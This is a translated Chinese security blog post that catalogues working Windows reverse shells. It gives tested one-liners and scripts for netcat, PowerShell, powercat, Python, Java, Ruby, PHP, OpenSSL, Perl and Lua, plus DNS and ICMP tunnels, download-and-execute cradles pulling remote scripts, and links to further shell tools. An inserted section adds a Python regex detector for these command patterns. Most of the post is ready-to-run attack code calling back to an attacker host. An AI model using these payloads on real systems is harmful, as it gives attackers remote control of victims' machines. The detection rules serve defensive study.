反弹shell之Windows反向shell

admin, 1 June 2021 04:53:12
0x00 Introduction

A reverse shell works as follows: the controlling host listens on some TCP/UDP port, the controlled host initiates a connection to that port, and the controlled host's command-line input and output are redirected to the controller.

A reverse shell is the counterpart of standard shells such as telnet and ssh; in network terms it is simply the client and server roles swapped.


This post is the outline I put together of reverse shells on Windows using various languages.

It is already long, so it covers only the practical projects; plenty of earlier writers have covered the principles.


PS: Throughout the post, 1.1.1.1 stands for the public-facing host IP and 4444 for the listening port.
PS: For some languages I did not find the most basic bind/reverse shell code, only a fuller-featured version; adapt it yourself.
PS: Because entries are grouped by behaviour and platform, some tools appear in more than one section.


0x01 netcat-windows

netcat download:

https://eternallybored.org/misc/netcat/   # consider using Ncat instead

Attacker host listens:

nc -lp 4444

Target host connects back (netcat or Ncat build):

nc 1.1.1.1 4444 -e c:\windows\system32\cmd.exe
ncat 1.1.1.1 4444 -e c:\windows\system32\cmd.exe




0x02 Powershell-windows

Run the listener on the attacker host:

nc -lvvp 4444

Run on the target host:


# OK: reverse shell received
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# OK: reverse shell received
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('1.1.1.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# ERROR: no response after the connection is made
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("1.1.1.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Combined PowerShell reverse shell projects:

mini-reverse.ps1   # cannot be used as-is; edit the callback IP first
# after editing the IP, download and run remotely
powershell -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SkullSec/mini-reverse/master/mini-reverse.ps1')
# or download locally, edit the IP, then run
powershell -NoP -NonI -W Hidden -Exec Bypass .\mini-reverse.ps1

powershell-reverse-tcp   # collection of PowerShell bind and reverse shells
https://github.com/ivan-sincek/powershell-reverse-tcp

CodeExecution-Meterpreter.ps1   # reverse Meterpreter via PowerShell
https://raw.githubusercontent.com/3gstudent/Code-Execution-and-Process-Injection/master/2-CodeExecution-Meterpreter.ps1




0x03 powercat
powercat is a PowerShell port of netcat; in my tests it is no longer undetected by AV.

Download and run remotely:

PS C:\WWW> powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 1.1.1.1 -p 4444 -e cmd

Download to the target machine and run locally:

PS C:\WWW> Import-Module ./powercat.ps1
PS C:\WWW> powercat -c 1.1.1.1 -p 4444 -e cmd

Uploading a generated powercat shell script:

# 1. Generate the reverse shell script
PS C:\> Set-ExecutionPolicy Unrestricted
PS C:\> cd .\powercat
PS C:\powercat> Import-Module .\powercat.ps1
PS C:\powercat> powercat -c 1.1.1.1 -p 4444 -e cmd -g >> payload.ps1
# 2. Listen on the VPS for the reverse shell
nc -lvp 8080
# 3. Drop payload.ps1 onto the target machine and run it
powershell -exec bypass -Command "& {Import-Module 'C:\payload.ps1'}"




0x04 python2-windows

Python 2 Windows reverse shell

# Run the listener on the attacker host:
nc -lvvp 4444
# Run on the target host:
python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1.1.1.1', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\windows\system32\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Python UDP reverse shell

https://github.com/ecthros/udpshell
# Run the listener on the attacker host (it must receive in UDP mode):
nc -l -p 53 -u
# Run on the target host:
python2 udpshell.py 1.1.1.1 53 udp   # Linux OK; Windows OK

Other Python reverse shell projects:
Python code for Windows bind and reverse shells: https://www.cnblogs.com/KevinGeorge/p/9780151.html



0x05 Java-windows

Run the listener on the attacker host:

nc -lvvp 4444

Compile and run the Java program on the target machine:

# shell.java
import java.net.*;import java.io.*;import java.io.OutputStream;import java.io.InputStream;public class shell{public static void main (String args[]) throws Exception{int c;Socket s=new Socket("1.1.1.1",4444);Process p=new ProcessBuilder("C:\\Windows\\System32\\cmd.exe").redirectErrorStream(true).start();InputStream pin=p.getInputStream(),sin=s.getInputStream();OutputStream pout=p.getOutputStream(),sout =s.getOutputStream();while(!s.isClosed()){while( pin.available() > 0 ){sout.write(pin.read());} while( sin.available() > 0){pout.write(sin.read());} pout.flush();sout.flush();try{p.exitValue();break;} catch (Exception e){}} p.destroy();s.close();}}
# Usage: javac shell.java && java shell
# Note: before compiling, the file name must match the class name
shell.java, formatted:

//Author  #Captain_Nemo
import java.net.*;
import java.io.*;
import java.io.OutputStream;
import java.io.InputStream;

public class shell {
    public static void main(String args[]) throws Exception {
        int c;
        Socket s = new Socket("1.1.1.1", 4444);
        //Runtime r = Runtime.getRuntime();
        //Process p = r.exec(new String[] {"C:\\Windows\\System32\\cmd.exe", "/K", "Start"});
        Process p = new ProcessBuilder("C:\\Windows\\System32\\cmd.exe").redirectErrorStream(true).start();
        InputStream pin = p.getInputStream(), sin = s.getInputStream();
        OutputStream pout = p.getOutputStream(), sout = s.getOutputStream();
        while (!s.isClosed()) {
            // forward the process output to the socket
            while (pin.available() > 0) {
                //int buff = in.read();
                sout.write(pin.read());
            }
            // forward socket input to the process
            while (sin.available() > 0) {
                //int buff1 = in1.read();
                pout.write(sin.read());
            }
            pout.flush();
            sout.flush();
            // exitValue() throws while the process is still running
            try {
                p.exitValue();
                break;
            } catch (Exception e) {}
        } // end while
        p.destroy();
        s.close();
    } //end main
} //end class def


0x06 ruby-windows
Ruby Windows reverse shell code
Run the listener on the attacker host: nc -lvvp 4444
Run on the target host (three variants, with my test results):
ruby -r socket -e "c=TCPSocket.new('1.1.1.1','4444');while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end"   # ERROR: disconnects after connecting
ruby -rsocket -e "c=TCPSocket.new('1.1.1.1','4444');while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end"   # ERROR: disconnects after connecting
ruby -r socket -e "c=TCPSocket.new('1.1.1.1','4444');while(cmd=c.gets);IO.popen(cmd){|io|c.print io.read}end"   # OK

# Generic Ruby reverse shell code
#!/usr/bin/env ruby
require 'socket'
require 'open3'
#Set the Remote Host IP
RHOST = "1.1.1.1"
#Set the Remote Host Port
PORT = "4444"
#Tries to connect every 20 sec until it connects.
begin
  sock = TCPSocket.new "#{RHOST}", "#{PORT}"
  sock.puts "We are connected!"
rescue
  sleep 20
  retry
end
#Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
      IO.copy_stream(stdout_and_stderr, sock)
    end
  end
rescue
  retry
end

Ruby bind and reverse shell projects: https://github.com/Hood3dRob1n/Ruby-Bind-and-Reverse-Shells


0x07 php-windows

In a PHP environment, simply visiting this script spawns an ordinary interactive shell back to the specified IP and port; PHP must not have the exec function disabled.

# php-reverse-shell-win
<?php
header('Content-type: text/plain');
$ip   = "1.1.1.1"; //change this
$port = "4444"; //change this
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir = "C:\\windows\\temp";
chdir($tmpdir);
$res .= "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
?>

Generic PHP reverse shell projects:

php-reverse-shell   # works on Linux, macOS and Windows
https://github.com/ivan-sincek/php-reverse-shell   # tested on Linux; can be used as a web script
# php_reverse_shell.php needs PHP 5.0.0 or later; php_reverse_shell_older.php needs PHP 4.3.0 or later



0x08 OpenSSL-windows
Reference: Reverse encrypted shell with OpenSSL, https://www.cnblogs.com/heycomputer/articles/10697865.html


On Windows the way to get an encrypted reverse shell is a little different.

The command is:

openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]

This command reads commands from [ip]:[port1], hands them to cmd.exe to execute, and returns the output to [ip]:[port2].


So two s_server instances are needed on the attacker host:

# port1 sends commands to cmd
openssl s_server -quiet -key [keyfile] -cert [cert] -port [port1]
# port2 receives the output of the commands sent via port1
openssl s_server -quiet -key [keyfile] -cert [cert] -port [port2]
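As an added defensive example (not part of the original post or any of the projects it lists), the following Python scans constructed process-creation records for the command-line shapes catalogued in sections 0x01 to 0x08: the TCPClient one-liner, the hidden-window/bypass launch flags, the IEX download cradle, nc/ncat/powercat with -e, and the two-port openssl s_client pipeline. The rule names and the sample events are hypothetical.

```python
import re

# Constructed process-creation records (not from the original post), in the shape
# of Sysmon Event ID 1: (parent image, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object '
     'System.Net.Sockets.TCPClient("1.1.1.1",4444);$stream=$client.GetStream();'
     '$sendback=(iex $data 2>&1 | Out-String)'),
    ("cmd.exe", "nc.exe", r"nc 1.1.1.1 4444 -e c:\windows\system32\cmd.exe"),
    ("explorer.exe", "powershell.exe",
     "powershell IEX (New-Object System.Net.Webclient).DownloadString("
     "'https://example.invalid/powercat.ps1'); powercat -c 1.1.1.1 -p 4444 -e cmd"),
    ("explorer.exe", "cmd.exe",
     "cmd /c openssl s_client -quiet -connect 1.1.1.1:443 | cmd.exe | "
     "openssl s_client -quiet -connect 1.1.1.1:8443"),
    ("explorer.exe", "powershell.exe", r"powershell Get-ChildItem C:\Users"),
]

# One regex per command-line shape catalogued in sections 0x01 to 0x08 (rule names
# are hypothetical); every pattern is case-insensitive.
RULES = {
    # 0x02: .NET TCPClient socket whose bytes are fed to iex and written back
    "ps_tcpclient_shell": re.compile(
        r"Net\.Sockets\.TCPClient.*(GetStream|Invoke-Expression|\biex\b)", re.I),
    # 0x02/0x03: hidden window plus execution-policy bypass on the same launch
    "ps_hidden_bypass": re.compile(
        r"-W(indowStyle)?\s+Hidden.*-Exec(utionPolicy)?\s+Bypass"
        r"|-Exec(utionPolicy)?\s+Bypass.*-W(indowStyle)?\s+Hidden", re.I),
    # 0x03/0x11: download cradle, the script text never touches disk
    "ps_download_cradle": re.compile(
        r"(\biex\b|Invoke-Expression).*DownloadString\(", re.I),
    # 0x01/0x03: nc, ncat or powercat handing cmd/powershell to a remote peer
    "netcat_exec_shell": re.compile(
        r"\b(nc|ncat|powercat)\b.*\s-e\s+\S*(cmd|powershell)", re.I),
    # 0x08: s_client on both sides of cmd.exe, the two-port encrypted pipeline
    "openssl_cmd_pipeline": re.compile(
        r"s_client.*-connect.*\|\s*cmd(\.exe)?\s*\|", re.I),
}

def classify(cmdline):
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(events):
    """Return (index, image, matched_rules) for each event that hits a rule."""
    hits = [(i, img, classify(cl)) for i, (_parent, img, cl) in enumerate(events)]
    return [h for h in hits if h[2]]
```

Running scan(SAMPLE_EVENTS) flags the first four records and leaves the plain Get-ChildItem launch alone; in practice the events would come from Sysmon or Windows 4688 logging with command-line auditing enabled.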





0x09 perl-windows


Run the listener on the attacker host:

nc -lvvp 4444

Run on the target host:

perl -MIO -e "$c=new IO::Socket::INET(PeerAddr,'1.1.1.1:4444');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"   # tested OK



0x10 lua


Lua reverse shell one-liner that works on both Windows and Linux
# Run the listener on the attacker host:
nc -lvvp 4444
# Run on the target host:
lua5.1 -e 'local host, port = "1.1.1.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'   # Linux lua5.1 OK





0x11 dns-windows

dnscat2 creates an encrypted command-and-control channel over the DNS protocol.

# GitHub project: https://github.com/iagox86/dnscat2

# Server:
ruby dnscat2.rb --dns "domain=lltest.com,host=xx.xx.xx.xx" --no-cache -e open
# Target host:
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx




0x12 icmp-windows

icmpsh is a simple ICMP reverse shell with a POSIX-compatible master implemented in C, Perl and Python and a Win32 slave. Compared with similar open-source tools, its advantage is that it does not need administrator privileges on the target machine.

icmpsh is simple to use, cross-platform, and runs without administrator privileges.

https://github.com/inquisb/icmpsh




0x13 VNC GUI
VNC is a graphical remote-management tool similar to RDP; the server side supports both listening for a client and connecting back to one.

Invoke-Vnc (PowerShell)   # runs a VNC server in memory and either connects back or binds to the given port
https://github.com/klsecservices/Invoke-Vnc

TightVNC portable   # portable VNC server and client; I do not know where this build came from, reply 共享 to the public account to get the file

References:
# Reverse VNC connection from the command line
https://blog.csdn.net/kf/article/details/8567726
# Using UltraVNC's reverse connection mode
https://blog.csdn.net/skydust1979/article/details/105935444/



0x14 C-CPP-CSharp

HARS, a C#-based encrypted reverse shell: https://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell
LOLBITS, a C#-based encrypted reverse shell: https://github.com/Kudaes/LOLBITS.git



0x15 golang-windows


Hershell, a powerful cross-platform reverse shell generator: https://github.com/lesnuages/hershell
ReverseGoShell, a Go reverse shell with dynamic AES encryption: https://github.com/TheKingOfDuck/ReverseGoShell



0x16 Other callback methods

cpl reverse Meterpreter: https://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp   # usage: build the DLL, rename it to .cpl, double-click to run





0x17 Summary

For any code or tool in this post without an address given, ask in the beginners' group.
This post is for technical reference only; do not use it for illegal purposes, or bear the consequences yourself.

PS: Off on a business trip again, so nobody proofread this post!

END



This post first appeared on the WeChat public account NOVASEC: 反弹shell之Windows反向shell

Please keep this link when reposting (CN-SEC, with thanks to the original author): http://cn-sec.com/archives/282269.html
